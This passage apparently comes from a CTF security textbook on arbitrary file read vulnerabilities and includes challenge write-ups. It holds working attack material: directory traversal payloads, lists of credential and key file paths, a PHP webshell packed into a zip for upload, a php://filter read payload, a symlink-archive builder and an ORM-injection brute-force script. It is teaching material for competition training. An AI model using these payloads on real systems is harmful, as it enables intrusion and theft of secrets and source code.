Python frameworks are not the only place where such problems occur. Many applications that perform file operations can also allow arbitrary file reads through misuse of the open function or improper template rendering. For example, some user-supplied data is stored on the server as part of a file name (common in authentication or logging services), and the processed user input is later used as an index to locate the file whose content is fetched. This gives the attacker a way to perform directory traversal.

As another example, in CTF online competitions a Python application may call an unsafe decompression module to unpack an archive, which leads to directory traversal once the files are extracted. Of course, the main danger of directory traversal during decompression is that existing files on the server can be overwritten.

Another situation is that the attacker builds a symbolic link and places it in the archive. After extraction, the link points directly to the corresponding file on the server, and when the attacker accesses the extracted link, the content of that file is returned. This will be analyzed in detail in the following chapters. As with PHP, some Python modules may also read files through XXE.
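Both archive tricks, traversal names and symbolic links, can be detected before extraction by inspecting the archive members. The following is a sketch using the standard zipfile module; risky_members() is a hypothetical helper, and the test archive is built in memory with made-up contents.

```python
import io
import posixpath
import stat
import zipfile

def risky_members(zf: zipfile.ZipFile):
    """Yield (name, reason) for entries that should not be extracted blindly."""
    for info in zf.infolist():
        mode = info.external_attr >> 16  # Unix mode bits, when present
        name = info.filename
        if stat.S_ISLNK(mode):
            yield name, "symbolic link"
        elif name.startswith("/") or ".." in posixpath.normpath(name).split("/"):
            yield name, "path traversal"

# Build a small archive in memory to exercise the check.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("ok.txt", "harmless")
    zf.writestr("../evil.txt", "would land outside the target directory")
    link = zipfile.ZipInfo("link")
    link.external_attr = (stat.S_IFLNK | 0o777) << 16
    zf.writestr(link, "/etc/passwd")  # link target is stored as file data

with zipfile.ZipFile(buf) as zf:
    findings = list(risky_members(zf))
print(findings)
```

Whether such entries are dangerous depends on the extraction code: the vulnerable pattern is an extractor that writes member names to disk verbatim or recreates links without checking where they point.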

In addition, Python’s template injection, deserialization, and other vulnerabilities can cause arbitrary file reading to a certain extent. Of course, the most significant harm is still causing arbitrary command execution.

  3. Java

In addition to file reads caused by FileInputStream or by XXE, some Java modules also support the "file://" protocol, which is where arbitrary file reads occur most often in Java applications. Examples include the Spring Cloud Config Server path traversal and arbitrary file read vulnerability (CVE-2019-3799) and the Jenkins arbitrary file read vulnerability (CVE-2018-1999002).

  4. Ruby

In CTF online competitions, Ruby arbitrary file read vulnerabilities are usually associated with the Rails framework. The generic vulnerabilities known so far are Ruby on Rails Remote Code Execution (CVE-2016-0752), Ruby on Rails Path Traversal and Arbitrary File Read (CVE-2018-3760), and Ruby on Rails Path Traversal and Arbitrary File Read (CVE-2019-5418). The author has encountered the Ruby on Rails Remote Code Execution vulnerability (CVE-2016-0752) in a CTF competition.

  1. 5.

    Node

At present, the express module of Node.js is known to have an arbitrary file reading vulnerability (CVE-2017-14849), but the author has not encountered relevant CTF challenges. In CTF challenges, file reading in Node is usually achieved through template injection, code injection, and similar vulnerabilities.

1.3.1.2 Middleware/Server Related

Different middleware/servers may also have file reading vulnerabilities. This section introduces them using several middleware/servers as examples.

  1. 1)

    Nginx Misconfiguration

File read vulnerabilities caused by Nginx misconfigurations are frequently found in CTF online competitions, especially when Nginx is used with Python web applications. This is because Nginx is generally considered the best choice of reverse proxy for Python web applications. However, a misconfigured configuration file can easily cause serious problems. For example:

location /static { alias /home/myapp/static/; }

If the configuration file contains the above option, the maintainers or developers most likely want users to be able to access the static directory (usually a static resource directory). However, if the web path requested by the user is /static../, splicing it into the alias yields /home/myapp/static/../, which creates a directory traversal vulnerability that reaches the myapp directory. At this point, an attacker can download Python source code and bytecode files at will. Note: The vulnerability is caused by the missing “/” at the end of the location, which lets Nginx match the prefix /static and splice the rest of the path onto the alias. Nginx does not regard /static../ as crossing directories; it treats it as a complete directory name.
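The splicing described above can be sketched in a few lines of Python. This is only a simplified model of prefix matching with alias, not Nginx's actual implementation; the function name resolve_alias and the requested file names are hypothetical.

```python
import posixpath

def resolve_alias(request_path, location="/static", alias="/home/myapp/static/"):
    """Simplified model of an Nginx prefix location combined with alias.

    The part of the request path after the location prefix is appended
    to the alias verbatim. Returns None when the location does not match.
    """
    if not request_path.startswith(location):
        return None
    spliced = alias + request_path[len(location):]
    # The ".." component is only resolved when the path reaches the file system.
    return posixpath.normpath(spliced)

normal = resolve_alias("/static/css/site.css")
leaked = resolve_alias("/static../app.py")
print(normal)
print(leaked)
```

In this model, writing the location as /static/ (with the trailing slash) would stop /static../ from matching at all, which is the usual fix.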

  1. 2)

    Database

Many databases can perform file reading operations, so let us take MySQL as an example.

MySQL's load_file() function can read a file, but several conditions must hold. First, the database account needs the FILE privilege (which the database root user usually has). Second, the MySQL user/group executing load_file() must have read permission on the target file (many configuration files are readable by all users/groups). Third, mainstream Linux systems also require AppArmor to be configured with a directory whitelist (by default, the whitelist is restricted to MySQL-related directories). This is a “lot of work”. Even with such strict exploit conditions, we often encounter this kind of file reading challenge in CTF online competitions.

There is another way to read a file, but unlike the load_file() function, it requires executing a complete SQL statement, i.e., load data infile. It also requires the FILE privilege, but it is rare because, except in the particular case of SSRF attacks on MySQL, there are very few cases where an entire, non-basic SQL statement can be executed directly.

  1. 3)

    Soft Links

The bash command ln -s creates a soft link to a specified file. If we upload the soft link file to the server and then request the link file, we are actually requesting the file it points to on the server.
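When the link has to travel inside an archive, it can also be built without touching the local file system. The following is a minimal sketch using Python's standard tarfile module; the member name avatar.png and the target /etc/passwd are chosen only for illustration.

```python
import io
import tarfile

def build_symlink_archive(link_name, target):
    """Return the bytes of a tar archive holding a single symbolic link."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w") as archive:
        entry = tarfile.TarInfo(name=link_name)
        entry.type = tarfile.SYMTYPE   # mark the member as a symbolic link
        entry.linkname = target        # the file the link points to
        archive.addfile(entry)
    return buffer.getvalue()

archive_bytes = build_symlink_archive("avatar.png", "/etc/passwd")

# Re-open the archive to confirm what an extractor would see.
with tarfile.open(fileobj=io.BytesIO(archive_bytes)) as archive:
    member = archive.getmembers()[0]
    print(member.name, "->", member.linkname, member.issym())
```

Whether the server follows the link after extraction depends on how the extracted files are served, so this only prepares the input for testing.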

  1. 4)

    FFmpeg

In June 2017, an arbitrary file read vulnerability was discovered in FFmpeg. A challenge in the CISCN competition exploited this vulnerability (see https://www.cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html for the writeup).

  1. 5)

    Docker-API

Docker-API can control the behavior of Docker, generally communicating over UNIX sockets but also communicating directly over HTTP. When we encounter an SSRF vulnerability, especially if we can communicate with UNIX sockets via SSRF vulnerability, we can manipulate Docker-API to load local files into a new Docker container for reading (using Docker's ADD and COPY operations).

1.3.1.3 Client Related

There are also file read vulnerabilities on the client-side, primarily based on XSS vulnerabilities to read local files.

  1. 1)

    Browser/Flash XSS

Generally speaking, many browsers restrict JavaScript operations that read local files. For example, when a remote website is requested and its JavaScript code uses the File protocol to read the client's local files, the read fails because of the same-origin policy. However, flaws introduced during browser development can bypass these measures, such as the client-side local file read vulnerability in Safari discovered in August 2017.

  1. 2)

    MarkDown Syntax Parser XSS

Similar to XSS, Markdown parsers also have some ability to parse JavaScript. However, most of these parsers do not restrict local file reads as browsers do, and they rarely have safeguards comparable to the same-origin policy.

1.3.2 Common Read Paths for File Read Vulnerabilities

1.3.2.1 Linux

  1. 1.

    flag name (relative path)

During the CTF competitions, sometimes we need to guess or fuzz the real flag file name. Please note the following file names and suffixes, and make your own decisions according to the challenge information and challenge environment.

../../../../../../../../../../../../../../flag(.txt|.php|.pyc|.py ...)
flag(.txt|.php|.pyc|.py ...)
[dir_you_know]/flag(.txt|.php|.pyc|.py ...)
../../../../../../../../../../../../../../etc/flag(.txt|.php|.pyc|.py ...)
../../../../../../../../../../../../../../../../../tmp/flag(.txt|.php|.pyc|.py ...)
../flag(.txt|.php|.pyc|.py ...)
../../../../../../../../../../../../../root/flag(.txt|.php|.pyc|.py ...)
../../../../../../../../../../../home/flag(.txt|.php|.pyc|.py ...)
../../../../../../../../../../../home/[user_you_know]/flag(.txt|.php|.pyc|.py ...)
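Such a list is easy to generate for fuzzing. The sketch below is one possible way to do it; the function name flag_candidates, the default depth, and the sample directory /var/www/html are assumptions for illustration, and the suffix list should be adjusted to the challenge.

```python
from itertools import product

def flag_candidates(depth=10, known_dirs=()):
    """Build candidate flag paths from common prefixes and suffixes."""
    up = "../" * depth  # enough "../" segments to reach the root directory
    prefixes = ["", "../", up, up + "etc/", up + "tmp/", up + "root/", up + "home/"]
    # Directories already learned from the challenge (web root, user home, ...).
    prefixes += [d.rstrip("/") + "/" for d in known_dirs]
    suffixes = ["", ".txt", ".php", ".pyc", ".py"]
    return [prefix + "flag" + suffix for prefix, suffix in product(prefixes, suffixes)]

candidates = flag_candidates(depth=2, known_dirs=["/var/www/html"])
for path in candidates[:5]:
    print(path)
```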

  1. 2.

    server information (absolute path)

The following is a list of paths that commonly appear in CTF online competitions and that you need to know. It is recommended that the reader go through these files after reading this book and also learn about common files that are not listed here.

  1. (1)

    /etc directory

The /etc directory mainly contains various application or system configuration files, so its files are the primary targets for file reading.

  1. (2)

    /etc/passwd

The /etc/passwd file is a Linux system file that stores user information and working directories. It is readable by all users/groups and is generally used as a baseline for confirming that a file read vulnerability exists on a Linux system. Reading this file tells us which users exist on the system, what groups they belong to, and their working directories.

  1. (3)

    /etc/shadow

/etc/shadow is a Linux system file that stores user information and (possibly) password hashes. Only the root user/group can write to this file, and only the root user and the shadow group can read it, so it is generally not readable in CTF competitions.

  1. (4)

    /etc/apache2/*

/etc/apache2/* are the Apache configuration files that allow you to get information about web directories, service ports, etc. Some CTF challenges require you to leak the web path.

  1. (5)

    /etc/nginx/*

/etc/nginx/* are the Nginx configuration files (on systems such as Ubuntu) that allow you to get information about web directories, service ports, and so on.

  1. (6)

    /etc/apparmor(.d)/*

/etc/apparmor(.d)/* are the AppArmor configuration files, which can be used to get the allowlist or blocklist of system calls for each application. For example, you can read the configuration to see whether system calls are disabled for MySQL and thus determine whether you can use UDF (User Defined Functions) to execute system commands.

  1. (7)

    /etc/(cron.d/*|crontab)

/etc/(cron.d/*|crontab) are the cron files. Some CTF challenges set up cron services, and reading these configuration files can reveal hidden directories or other files.

  1. (8)

    /etc/environment

/etc/environment is one of the environment variable configuration files. Environment variables may leak a lot of directory information, and sometimes even a secret key.

  1. (9)

    /etc/hostname

/etc/hostname represents the hostname.

  1. (10)

    /etc/hosts

/etc/hosts is a static hostname lookup table that maps hostnames and domains to IP addresses. With this file, CTF players can get network information and intranet IPs/domains.

  1. (11)

    /etc/issue

/etc/issue specifies the system version.

  1. (12)

    /etc/mysql/*

/etc/mysql/* are the MySQL configuration files.

  1. (13)

    /etc/php/*

/etc/php/* are the PHP configuration files.

  1. (14)

    /proc directory

The /proc directory stores various information about running processes and is essentially a virtual directory. Note: To view the information of a process other than the current one, the PID can be brute-forced. To view the current process, simply replace /proc/[pid]/ with /proc/self/.

The cmdline file in the corresponding directory can reveal sensitive information, e.g., logging into MySQL using mysql -uxxx -pxxxx leaves the plaintext password in the cmdline file.

/proc/[pid]/cmdline (the terminal command that started the process)

When we cannot determine the directory of the current application, cwd lets us jump directly to the working directory of the process.

/proc/[pid]/cwd/ (points to the running directory of the process)

There may be a secret_key in the environment variables, which can be read from environ.

/proc/[pid]/environ (the environment variables of the process at run time)
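Both cmdline and environ are returned as raw bytes in which the entries are separated by NUL characters, so the output of a file read vulnerability usually needs a little post-processing. A minimal sketch follows; the sample bytes stand in for a leaked response and are not taken from a real challenge.

```python
def parse_cmdline(raw):
    """Split the NUL-separated bytes of /proc/[pid]/cmdline into arguments."""
    return [part.decode(errors="replace") for part in raw.split(b"\0") if part]

def parse_environ(raw):
    """Turn the NUL-separated KEY=VALUE bytes of /proc/[pid]/environ into a dict."""
    env = {}
    for item in raw.split(b"\0"):
        key, sep, value = item.partition(b"=")
        if sep:  # skip empty or malformed entries
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

# Sample data standing in for the bytes returned by the vulnerable endpoint.
sample_cmdline = b"mysql\0-uxxx\0-pxxxx\0"
sample_environ = b"PWD=/app\0SECRET_KEY=example\0"

args = parse_cmdline(sample_cmdline)
env = parse_environ(sample_environ)
print(args)
print(env.get("SECRET_KEY"))
```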

  1. (15)

    Other Directories

There may be other paths to the Nginx configuration file.

/usr/local/nginx/conf/* (source code installation or some other system)

Log files.

/var/log/* (for web applications served by Apache 2, /var/log/apache2/access.log can often be read, which allows us to analyze the logs and steal other players' solution steps)

Apache Default Web Root.

/var/www/html/

PHP session directory.

/var/lib/php(5)/sessions/ (disclosure of user session)

User directory.

[user_dir_you_know]/.bash_history (discloses the command history)
[user_dir_you_know]/.bashrc (some environment variables)
[user_dir_you_know]/.ssh/id_rsa(.pub) (SSH login private key/public key)
[user_dir_you_know]/.viminfo (vim usage record)

Sometimes we want to read the executable file of the current application for analysis, but in practice some security measures may prevent us from reading it directly, in which case we can try to read /proc/self/exe.

/proc/[pid]/fd/(1|2...) (reads stdout, stderr, or any other file descriptor opened by the process [pid])
/proc/[pid]/maps (memory map of the process [pid])
/proc/[pid]/(mounts|mountinfo) (CTF challenges commonly run in Docker environments, in which case mounts reveals some sensitive paths)
/proc/[pid]/net/* (network information of the process [pid]; e.g., reading tcp reveals the TCP ports the process is bound to, and reading arp leaks intranet IP addresses on the same segment)

1.3.2.2 Windows

The Windows web application arbitrary file read vulnerability is not common in CTF challenges, but there is a problem when Windows is used with PHP: it is possible to use symbols such as “<” as wildcards to read files without knowing the full file name. The contents are described in detail in the following examples.

1.3.3 File Read Vulnerability Example

Based on a large number of relevant CTF real challenges, this section introduces real-world cases of file reading vulnerabilities.

1.3.3.1 Soldiers Are Tricky (HCTF 2016)

【Intro】 The first half of the path argument passed to the include function is controlled by the attacker, while the second half is fixed: the uncontrollable part is the .php suffix.

...
$fp = empty($_GET['fp']) ? 'fail' : $_GET['fp'];
if (preg_match('/\.\./', $fp)) {
    die('No No No!');
}
if (preg_match('/rm/i', $_SERVER["QUERY_STRING"])) {
    die();
}
...
if ($fp !== 'fail') {
    if (!(include($fp.'.php'))) {
    ...

There is a file upload function in upload.php, but the name of the file stored on the server cannot be controlled.

...
// function.php
function create_imagekey() {
    return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand());
}
...
// upload.php
$imagekey = create_imagekey();
move_uploaded_file($name, "uploads/$imagekey.png");
echo "<script>location.href='?fp=show&imagekey=$imagekey'</script>";
...

【Difficulty】 Moderate.

【Knowledge】 Filter utilization of php:// protocol; file inclusion via zip:// protocol.

【Challenge solving】 Start the challenge. The home page contains only an upload form, so first upload a normal file for testing. By intercepting the traffic, we find that the POST data is sent to “/?fp=upload”; following the requests, we see that the result redirects to “/?fp=show&imagekey=xxx”.

From there, the direction of thinking will vary for players with different levels of experience.

  1. (1)

    Step 1

Novice players: Continue to test the file upload function.

Experienced players: Seeing the fp argument, they associate it with a file pointer, i.e., the value of fp may be related to a file.

  1. (2)

    Step 2

Novice players: How could I bypass the file upload protection mechanism?

Experienced players: request show.php and upload.php directly, look for PHP files whose names carry the meaning of show or upload, or change show/upload to another known file name such as “home”.

More experienced players: change the value of the fp parameter to “./show”, “../html/show”, etc. We cannot know the exact path of the included file, and if the path is unusual, we cannot locate the original PHP file directly. The “./show” form solves this problem and makes it easy to determine whether an arbitrary file inclusion vulnerability exists.

  1. (3)

    Step 3

Novice players: This challenge must require a 0day to bypass the protection. I should give up.

Experienced players: Based on the results of directly accessing “show.php/upload.php” and “?fp=home”, conclude that there is a file inclusion vulnerability. Use the Filter mechanism to construct attack data such as “php://filter/convert.base64-encode/resource=xxx” to read files and obtain the source code of the various files. Then upload a Zip file that contains a compressed Webshell and call the Webshell inside the archive through the zip:// protocol. The link to access this Webshell is

?fp=zip://uploads/fe5e1c43e6e6bcfd506f0307e8ed6ec7ecc3821d.png%231&shell=phpinfo();

fe5e1c43e6e6bcfd506f0307e8ed6ec7ecc3821d.png (zipfile)
    1.php (phpfile) => "<?php eval($_GET['shell']);?>"

  • 【Summary】 ① The challenge first examines the player's ability to find file reading/inclusion vulnerabilities through black-box testing. Everyone has their own testing method, and the ideas written above are for reference only. When conducting black-box testing, we must notice the keywords in the parameters and be able to make associations from them.

  • ② It examines the players' use of Filter, such as php://filter/convert.base64-encode (encode the file stream through Base64).

  • ③ It examines the players' use of the zip:// protocol: treat the file stream as a Zip file stream, and use “#” (%23) to select the stream of a specified file inside the archive.

Point ③ may need more explanation. When the Zip file we uploaded is accessed through the zip:// protocol, it is automatically parsed according to the Zip file structure, and a file inside it is selected by “#” (URL-encoded as %23) followed by the file name. In the example above, a file named 1.php is stored inside the archive. In this case, the whole file stream is positioned at 1.php, so the included content is the content of 1.php, as shown in Fig. 1.65.

Fig. 1.65 Execution process
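The zip:// step can be prepared with a short script. The sketch below builds the archive in memory and composes the include parameter; the helper names build_zip_payload and include_url are hypothetical, and the image key is the one from the example link. The bytes would be uploaded through the challenge's form as an ordinary image.

```python
import io
import zipfile
from urllib.parse import quote

def build_zip_payload(inner_name="1.php", php_code="<?php eval($_GET['shell']);?>"):
    """Return the bytes of a Zip archive that contains one PHP file."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr(inner_name, php_code)
    return buffer.getvalue()

def include_url(imagekey, inner_stem="1"):
    """Compose the fp parameter; include() appends '.php' to the stem itself."""
    return "?fp=zip://uploads/" + imagekey + ".png" + quote("#") + inner_stem

payload = build_zip_payload()
url = include_url("fe5e1c43e6e6bcfd506f0307e8ed6ec7ecc3821d")
print(len(payload), "bytes, starts with", payload[:2])
print(url)
```

The server stores the upload with a .png name, but zip:// parses the content rather than the extension, which is why the renamed archive still works.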

1.3.3.2 PWNHUB-Classroom

【Intro】 The challenge is developed with the Django framework, and its static resource directory is configured in an insecure way.

# urls.py
from django.conf.urls import url
from . import views

urlpatterns = [
    url('^$', views.IndexView.as_view(), name='index'),
    url('^login/$', views.LoginView.as_view(), name='login'),
    url('^logout/$', views.LogoutView.as_view(), name='logout'),
    url('^static/(?P<path>.*)', views.StaticFilesView.as_view(), name='static'),
]
...
# views.py
...
class StaticFilesView(generic.View):
    content_type = 'text/plain'

    def get(self, request, *args, **kwargs):
        filename = self.kwargs['path']
        filename = os.path.join(settings.BASE_DIR, 'students', 'static', filename)
        name, ext = os.path.splitext(filename)
        if ext in ('.py', '.conf', '.sqlite3', '.yml'):
            raise exceptions.PermissionDenied('Permission deny')
        try:
            return HttpResponse(FileWrapper(open(filename, 'rb'), 8192), content_type=self.content_type)
        except BaseException as e:
            raise Http404('Static file not found')
...

【Difficulty】 Moderate.

【Knowledge】 Python (Django) file read vulnerability caused by static resource configuration error; Pyc bytecode file decompilation; Django framework ORM injection.

【Challenge solving】 The first vulnerability: the code captures the part of the URL path after static/, passes it to os.path.join to build an absolute path by joining it with some fixed directories, and then checks the file extension. After the check, the absolute path is passed to open(), and the file content is read and returned to the user.

The second vulnerability is in the LoginView class in views.py. As you can see, after the JSON data sent by the user is loaded, it is passed directly into x.objects.filter (a native Django ORM function).

...
class LoginView(JsonResponseMixin, generic.TemplateView):
    template_name = 'login.html'

    def post(self, request, *args, **kwargs):
        data = json.loads(request.body.decode())
        stu = models.Student.objects.filter(**data).first()
        if not stu or stu.passkey != data['passkey']:
            return self._jsondata('', 403)
        else:
            request.session['is_login'] = True
            return self._jsondata('', 200)
...
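Because the JSON keys become keyword arguments of filter(), the attacker can choose field lookups such as passkey__startswith. The following sketch models this without Django: fake_login is a stand-in for LoginView.post that supports only two lookups on one field, and SECRET_PASSKEY is a made-up value. It assumes that a matching row combined with a missing 'passkey' key produces a server error, which gives a response different from the 403 returned when nothing matches.

```python
import string

SECRET_PASSKEY = "s3cr3t"  # hypothetical value stored in the database

def fake_login(data):
    """Stand-in for LoginView.post; returns an HTTP status code.

    Only the passkey field with exact and startswith lookups is modelled.
    """
    matched = True
    for key, value in data.items():
        field, _, lookup = key.partition("__")
        if field != "passkey" or lookup not in ("", "exact", "startswith"):
            raise ValueError("lookup not modelled in this sketch")
        if lookup == "startswith":
            matched = matched and SECRET_PASSKEY.startswith(value)
        else:
            matched = matched and SECRET_PASSKEY == value
    if not matched:
        return 403  # filter(...).first() found no row
    if "passkey" not in data:
        return 500  # data['passkey'] would raise KeyError
    return 200 if data["passkey"] == SECRET_PASSKEY else 403

def recover_passkey(alphabet=string.ascii_lowercase + string.digits):
    """Extend the known prefix one character at a time using the status code."""
    known = ""
    while fake_login({"passkey": known}) != 200:
        for char in alphabet:
            if fake_login({"passkey__startswith": known + char}) != 403:
                known += char
                break
        else:
            break  # no character matched; stop instead of looping forever
    return known

recovered = recover_passkey()
print(recovered)
```

Against the real service, the same loop would send JSON bodies over HTTP and compare status codes; the alphabet would need to cover the actual passkey characters.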

First open the challenge link; the Server information is displayed in the HTTP response header.

Server: gunicorn/19.6.0 Django/1.10.3 CPython/3.5.2

From this we know that the challenge is developed with Python's Django framework. When the source code of a Python challenge is not provided, we can first test for directory traversal vulnerabilities (caused by an insecure Nginx configuration or an insecure Python framework configuration). Here we use “/etc/passwd” as the test file, and the requested path is:

/static/../../../../../../etc/passwd

An arbitrary file reading vulnerability does exist. However, when trying to read the Python source files, we find that the server filters several common file extensions, including the Python, configuration file, SQLite, and YML extensions:

if ext in ('.py', '.conf', '.sqlite3', '.yml'):
    raise exceptions.PermissionDenied('Permission deny')

Is there any other way to get the source code? When a module is imported in Python 3, its bytecode is cached in the __pycache__ directory, where the pyc bytecode file is named as follows.

[module_name]+".cpython-3"+[\d](python3 minor version number) + ".pyc"

__pycache__/views.cpython-34.pyc is an example of a filename. Thus, we could get those cache files to get the source codes.
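The naming rule and the extension filter can be checked together offline. In the sketch below, BLOCKED mirrors the tuple from views.py, while the base directory /srv/app and the helper names are assumptions made for illustration.

```python
import os.path
import posixpath

BLOCKED = ('.py', '.conf', '.sqlite3', '.yml')  # the tuple checked in views.py

def is_blocked(path):
    """Replicate the extension check: only the last suffix is compared."""
    return os.path.splitext(path)[1] in BLOCKED

def cache_name(module, minor):
    """Name of the cached bytecode file for CPython 3.<minor>."""
    return "__pycache__/{}.cpython-3{}.pyc".format(module, minor)

target = cache_name("urls", 5)

# Model of os.path.join(settings.BASE_DIR, 'students', 'static', filename)
# with a hypothetical BASE_DIR of /srv/app.
resolved = posixpath.normpath(
    posixpath.join("/srv/app", "students", "static", "../" + target)
)
print(target, is_blocked(target))
print(resolved)
```

Since the Server header reveals the CPython version, the minor version in the file name does not have to be guessed.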

Replace the exploit path as follows.

/static/../__pycache__/urls.cpython-35.pyc

Now we successfully read the PYC bytecode file. Read all the remaining PYC files and then decompile the PYC bytecode file to get the source code. By reviewing the obtained source code, we found an ORM injection vulnerability, which can be exploited to obtain the flag content. See Fig. 1.66.

Fig. 1.66 Get flag

  • 【Summary】 ① CTF players need to judge the challenge’s environment through the fingerprint information in the HTTP header. Of course, some experience and skills may be involved here, which need to be accumulated through practice.

  • ② Players should be familiar with the environment and the web application framework used by the challenge. Even if they are unfamiliar with them at first, they must quickly set up the environment, learn the characteristics of the environment and framework, or look through the manual. Note: Quickly setting up an environment and learning its features is a basic ability for CTF players solving Web challenges.

  • ③ Players should be able to find a directory traversal vulnerability through black-box testing and then use it to read arbitrary files.

  • ④ Source code audit: following ②, after understanding the characteristics of the framework, the flag is obtained through ORM injection.

1.3.3.3 Show Me the Shell I (TCTF/0CTF 2018 Final)

【Intro】 The vulnerability of the challenge is obvious. The UpdateHead function updates the avatar. The URL passed by the user may use the File protocol, which triggers the arbitrary file reading vulnerability of the URL component in the Download function.

// UserController.class
...
@RequestMapping(value={"/headimg.do"}, method={org.springframework.web.bind.annotation.RequestMethod.GET})
public void UpdateHead(@RequestParam("url") String url) {
    String downloadPath = this.request.getSession().getServletContext().getRealPath("/")+"/headimg/";
    String headurl = "/headimg/" + HttpReq.Download(url, downloadPath);
    User user = (User)this.session.getAttribute("user");
    Integer uid = user.getId();
    this.userMapper.UpdateHeadurl(headurl, uid);
}
...
// HttpReq.class
...
public static String Download(String urlString, String path) {
    String filename = "default.jpg";
    if (endWithImg(urlString)) {
        try {
            URL url = new URL(urlString);
            URLConnection urlConnection = url.openConnection();
            urlConnection.setReadTimeout(5000);
            int size = urlConnection.getContentLength();
            if (size < 10240) {
                InputStream is = urlConnection.getInputStream();
                ...

【Difficulty】 Easy.

【Knowledge】 The File protocol of Java URL component.

【Challenge solving】 Decompile the Java class bytecode files (e.g., with JD), then find the vulnerability in the source code through a code audit.

【Summary】 CTF players must accumulate experience and understand the protocols supported by the URL component. The slide shared after the competition is shown in Fig. 1.67.

Fig. 1.67 Trick explain
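Generic URL-opening helpers in other languages behave in a similar way. As an analogue in Python (not the challenge's Java code), urllib.request.urlopen also accepts file:// URLs, so a downloader that only inspects the end of the URL can be pointed at local files. The temporary file with a .jpg suffix below only loosely mirrors the idea of an image-suffix check.

```python
import os
import tempfile
from pathlib import Path
from urllib.request import urlopen

def fetch(url):
    """Open any URL scheme supported by urllib, including file://."""
    with urlopen(url) as response:
        return response.read()

# Create a local file whose name ends like an image, to pass a suffix check.
with tempfile.NamedTemporaryFile("w", suffix=".jpg", delete=False) as handle:
    handle.write("not really an image")
    local_path = Path(handle.name)

file_url = local_path.resolve().as_uri()  # file:///... form of the path
content = fetch(file_url)
os.unlink(local_path)
print(file_url.split(":")[0], content)
```

A safer downloader would check the parsed scheme against an explicit allowlist (for example http and https) before opening the connection.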

1.3.3.4 BabyIntranet I (SCTF 2018)

【Intro】 This challenge is developed using the Rails framework and contains the Ruby On Rails remote code execution vulnerability (CVE-2016-0752), through which files can be read arbitrarily (the root cause of the vulnerability is a file inclusion vulnerability).

def show
  render params[:template]
end

Reading the source code reveals that the application uses Rails' Cookie-Serialize module. By reading the application's key, we can construct malicious serialized data that executes malicious code when it is deserialized.

# config/initializers/cookies_serializer.rb
Rails.application.config.action_dispatch.cookies_serializer = :json

【Difficulty】 Moderate.

【Knowledge】 Ruby On Rails framework arbitrary file read vulnerability; Rails cookies deserialization vulnerability.

【Challenge solving】 Fingerprint the application; the fingerprint information shows that it was developed with the Rails framework. The HTML source code contains the link /layouts/c3JjX2lw, and Base64-decoding the part after /layouts/ yields src_ip. Searching for Rails-related vulnerabilities turns up the dynamic template rendering vulnerability (CVE-2016-0752). Encode ../../../../../../etc/passwd in Base64 and place it after /layouts/; the contents of the /etc/passwd file are then returned successfully.

Rendering the log file (../log/development.log) to execute arbitrary code fails because there is no permission to render this file. After reading all the readable code and configuration files, we find that the cookies_serializer module is used. Reading the current user's environment variable files also fails for lack of permission, so we read /proc/self/environ instead. After obtaining the key, use the corresponding Ruby deserialization attack module in Metasploit to exploit the vulnerability.
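The encoding step can be reproduced with the standard base64 module. In this minimal sketch, c3JjX2lw is the Base64 form of src_ip, and the helper name encode_template is hypothetical.

```python
import base64

def encode_template(path):
    """Base64-encode a template path the way the challenge expects it."""
    return base64.b64encode(path.encode()).decode()

# Decoding the value seen in the page confirms the encoding scheme.
decoded = base64.b64decode("c3JjX2lw").decode()

# Encode the traversal path and place it after /layouts/.
payload = encode_template("../../../../../../etc/passwd")
url = "/layouts/" + payload
print(decoded)
print(url)
```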

  • 【Summary】 ① Arbitrary file reading through Ruby On Rails remote code execution vulnerability (CVE-2016-0752) (the author modified the vulnerability code and encoded the path using Base64 encoding), as shown in Fig. 1.68.

  • ② The server denies read permission on the log, so it is not possible to execute arbitrary code directly by rendering the log. By reading the source code, we can find that Rails' Cookie-Serialize module is used in the application. The processing mechanism of the entire module is to serialize the real session_data and encrypt it in AES-CBC mode and then encode it twice with Base64. The processing flow is shown in Fig. 1.69.

This is also confirmed by the keyword Set-Cookie response from the server, see Fig. 1.70.

Fig. 1.68 Result

Fig. 1.69 Execution process

Fig. 1.70 Result

We can obtain the environment variables saved in /proc/self/environ through arbitrary file reading vulnerabilities, find the secret_key used for AES encryption, and then use secret_key to encrypt malicious serialized data. In this way, when the server performs the deserialization operation, it will trigger the vulnerability to execute malicious code, as shown in Fig. 1.71.

Fig. 1.71 Result

1.3.3.5 SimpleVN (BCTF 2018)

【Intro】 The function of the challenge is mainly divided into the following two points.

(1) The user can set a template to be rendered, but this template has certain restrictions. Only “.” and letters and numbers can be used. In addition, the functional API of the rendering template only allows 127.0.0.1 (local) to make requests.

...
const checkPUG = (upug) => {
    const fileterKeys = ['global', 'require']
    return /^[a-zA-z0-9\.]*$/g.test(upug) && !fileterKeys.some(t => upug.toLowerCase().includes(t))
}
...
console.log('Generator pug template')
const uid = req.session.user.uid
const body = `#{${upug}}`
console.log('body', body)
const upugPath = path.join('users', utils.md5(uid), `${uid}.pug`)
console.log('upugPath', upugPath)
try {
    fs.writeFileSync(path.resolve(config.VIEWS_PATH, upugPath), body)
} catch (err) {
...

(2) The challenge also provides an API that sends requests through a local proxy. The user enters a URL, and the backend starts the Chrome browser to request this URL, takes a screenshot of the requested page, and returns it to the user. The submitted URL is also restricted: its host must be the locally configured HOST (127.0.0.1). However, there is a flaw here: the HOST part of a File protocol URL is empty, so this check can be bypassed.

const checkURL = (shooturl) => {
    const myURL = new URL(shooturl)
    return config.SERVER_HOST.includes(myURL.host)
}
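The bypass can be reproduced in Python under one assumption: that config.SERVER_HOST is a plain string, so includes() performs a substring test. The function check_url below is a hypothetical re-implementation, not the challenge code.

```python
from urllib.parse import urlsplit

SERVER_HOST = "127.0.0.1"  # assumed to be a plain string in the challenge config

def check_url(shoot_url):
    """Mimic checkURL: accept the URL when its host is contained in SERVER_HOST."""
    host = urlsplit(shoot_url).netloc
    # Substring test, like String.prototype.includes; "" is contained in any string.
    return host in SERVER_HOST

print(check_url("http://127.0.0.1/render"))
print(check_url("http://example.com/"))
print(check_url("file:///etc/passwd"))
```

Comparing the host for equality and also requiring an http or https scheme would close this gap in the model.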

【Difficulty】 Moderate.

